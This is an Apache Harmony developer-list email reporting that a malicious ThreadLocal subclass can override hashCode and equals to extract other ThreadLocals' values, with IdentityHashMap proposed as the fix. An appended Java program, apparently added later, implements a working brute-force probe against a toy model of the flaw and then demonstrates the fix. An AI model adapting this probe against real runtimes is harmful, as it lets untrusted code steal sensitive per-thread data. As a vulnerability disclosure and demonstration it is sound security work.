From: Thomas Hawtin
To: harmony-dev@incubator.apache.org
Date: Fri, 17 Nov 2006 11:17:38 +0000
Subject: [drlvm][kernel_classes] ThreadLocal vulnerability
Message-ID: <455D9A52.2020407@tackline.plus.com>

I had a quick browse through the Harmony SVN and spotted what appears to be a vulnerability in the java.lang.ThreadLocal implementation.
I have briefly discussed this with Tim Ellison and Geir Magnusson Jr., off list, before posting here.

Harmony uses a per-Thread HashMap (WeakHashMap in classlibadapter) to map ThreadLocals onto values. HashMaps (should) check for equality with Object.equals and Object.hashCode instead of == and System.identityHashCode. Malicious subclasses of ThreadLocal can override hashCode to run through all possible hash codes, extracting all the ThreadLocals present in the current thread through an overridden equals. Some of these ThreadLocals may contain sensitive values. Even if Harmony generates identity hash codes entirely at random, the process should be completable in the order of a few minutes of CPU time.

Tim Ellison suggests replacing the HashMap with an IdentityHashMap. I agree that this would fix the security vulnerability. Some modern code, such as (I believe) Spring, creates many ThreadLocal instances, so you may wish to look further at quality-of-implementation issues.

FWIW, I believe early versions of Sun's 1.3 J2SE suffered a similar problem.

Tom Hawtin
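The probe described in the message above, as an added example that is neither Harmony's code nor part of the original post: a toy per-thread map in the style the mail describes, the malicious ThreadLocal subclass that sweeps the hash space, and the IdentityHashMap replacement Tim Ellison suggested. `ModelThreadLocal`, `Storage`, `Probe` and the secret value are constructed for this illustration and do not correspond to Harmony's own classes; the model uses a plain `HashMap` rather than the `WeakHashMap` the mail mentions for classlibadapter, which makes no difference to the attack.

```java
import java.util.HashMap;
import java.util.IdentityHashMap;
import java.util.Map;
import java.util.function.Supplier;

/**
 * Added illustration, not Harmony code. Models the per-thread HashMap design the mail
 * describes, the hashCode()/equals() probe it warns about, and the IdentityHashMap fix.
 * ModelThreadLocal, Storage and Probe are constructed for this example only.
 */
public class ThreadLocalProbe {

    /** Per-thread key->value maps, built by a caller-supplied factory (HashMap or IdentityHashMap). */
    static final class Storage {
        private final Supplier<Map<Object, Object>> factory;
        private final Map<Thread, Map<Object, Object>> perThread = new HashMap<>();

        Storage(Supplier<Map<Object, Object>> factory) { this.factory = factory; }

        synchronized Map<Object, Object> forCurrentThread() {
            return perThread.computeIfAbsent(Thread.currentThread(), t -> factory.get());
        }
    }

    /** Minimal ThreadLocal look-alike: the instance itself is the key into the current thread's map. */
    static class ModelThreadLocal<T> {
        private final Storage storage;

        ModelThreadLocal(Storage storage) { this.storage = storage; }

        @SuppressWarnings("unchecked")
        T get() { return (T) storage.forCurrentThread().get(this); }

        void set(T value) { storage.forCurrentThread().put(this, value); }
    }

    /**
     * The malicious subclass from the mail. hashCode() returns whatever the attacker sets, and
     * equals() claims to match any key the map compares it with, recording that key on the way.
     * A HashMap only calls equals() once the stored hash matches, so hitting the victim's identity
     * hash code is what the sweep below is for.
     */
    static final class Probe extends ModelThreadLocal<Object> {
        int forcedHash;
        Object matchedKey;

        Probe(Storage storage) { super(storage); }

        @Override public int hashCode() { return forcedHash; }

        @Override public boolean equals(Object other) {
            matchedKey = other;
            return true;
        }
    }

    private static Object tryHash(Probe probe, int hash) {
        probe.forcedHash = hash;
        return probe.get();   // the only API the attacker needs: ThreadLocal.get()
    }

    /**
     * Walks the 32-bit hash space until the map hands over some other ThreadLocal's value.
     * Non-negative codes go first: HotSpot's identity hash codes are 31-bit, so that half usually
     * suffices; a VM with fully random 32-bit codes (the mail's worst case) needs the negative half too.
     * Keep looping instead of returning to enumerate every ThreadLocal the thread holds.
     */
    static Object sweep(Probe probe) {
        for (long h = 0; h <= Integer.MAX_VALUE; h++) {
            Object v = tryHash(probe, (int) h);
            if (v != null) return v;
        }
        for (long h = -1; h >= Integer.MIN_VALUE; h--) {
            Object v = tryHash(probe, (int) h);
            if (v != null) return v;
        }
        return null;
    }

    public static void main(String[] args) {
        String secret = "constructed-secret-token";   // constructed sample value standing in for a sensitive ThreadLocal

        // Vulnerable design: HashMap honours the probe's overridden hashCode()/equals().
        Storage vulnerable = new Storage(HashMap::new);
        ModelThreadLocal<String> victim = new ModelThreadLocal<>(vulnerable);
        victim.set(secret);
        Probe probe = new Probe(vulnerable);
        Object stolen = sweep(probe);
        System.out.println("HashMap storage: probe recovered '" + stolen + "' via key " + probe.matchedKey);

        // Tim Ellison's fix: IdentityHashMap uses == and System.identityHashCode, ignoring the overrides.
        Storage fixed = new Storage(IdentityHashMap::new);
        ModelThreadLocal<String> victim2 = new ModelThreadLocal<>(fixed);
        victim2.set(secret);
        Probe probe2 = new Probe(fixed);
        probe2.forcedHash = System.identityHashCode(victim2);   // even the exact hash code buys nothing
        System.out.println("IdentityHashMap storage: probe got " + probe2.get()
                + ", victim still reads '" + victim2.get() + "'");
    }
}
```

Compile and run with `javac ThreadLocalProbe.java && java ThreadLocalProbe`. The first half of `main` performs the brute-force sweep the mail describes, so it takes on the order of the CPU time the mail estimates before it prints the secret together with a reference to the victim key; the second half shows that with `IdentityHashMap` the probe gets `null` even when handed the victim's exact identity hash code, because `IdentityHashMap` never consults the overridden `hashCode()` or `equals()`.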